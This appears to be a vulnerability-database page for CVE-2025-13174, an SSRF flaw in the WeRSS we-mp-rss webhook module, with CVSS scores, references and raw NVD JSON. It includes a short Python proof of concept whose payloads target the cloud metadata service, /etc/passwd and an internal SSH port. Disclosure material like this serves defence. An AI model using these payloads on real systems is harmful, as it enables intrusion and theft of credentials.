CVE-2025-13174

Description

A weakness has been identified in rachelos WeRSS we-mp-rss up to 1.4.7. Affected by this vulnerability is the function do_job of the file /rachelos/we-mp-rss/blob/main/jobs/mps.py of the component Webhook Module. Executing manipulation of the argument web_hook_url can lead to server-side request forgery. The attack may be launched remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

we-mp-rss <= 1.4.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-13174 SSRF PoC
# Target: rachelos WeRSS we-mp-rss <= 1.4.7

target_url = "http://target.com/api/do_job"

# SSRF payload - Internal metadata service
ssrf_payload = {
    "web_hook_url": "http://169.254.169.254/latest/meta-data/"
}

# SSRF payload - Local file access
file_ssrf_payload = {
    "web_hook_url": "file:///etc/passwd"
}

# SSRF payload - Internal port scan
internal_scan_payload = {
    "web_hook_url": "http://127.0.0.1:22"
}

# Send exploit
response = requests.post(target_url, json=ssrf_payload)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13174
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13174
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13174/
[4] VulDB https://vuldb.com/cve/CVE-2025-13174
[5] https://vuldb.com/?ctiid.332465
[6] https://vuldb.com/?id.332465
[7] https://vuldb.com/?submit.684803
[8] https://www.notion.so/SSRF-vulnerability-in-WeRSS-WebHook-module-29bea92a3c4180a192b5caa9078bfb18

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13174", "sourceIdentifier": "[email protected]", "published": "2025-11-14T19:15:57.533", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in rachelos WeRSS we-mp-rss up to 1.4.7. Affected by this vulnerability is the function do_job of the file /rachelos/we-mp-rss/blob/main/jobs/mps.py of the component Webhook Module. Executing manipulation of the argument web_hook_url can lead to server-side request forgery. The attack may be launched remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://vuldb.com/?ctiid.332465", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332465", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.684803", "source": "[email protected]"}, {"url": "https://www.notion.so/SSRF-vulnerability-in-WeRSS-WebHook-module-29bea92a3c4180a192b5caa9078bfb18", "source": "[email protected]"}]}}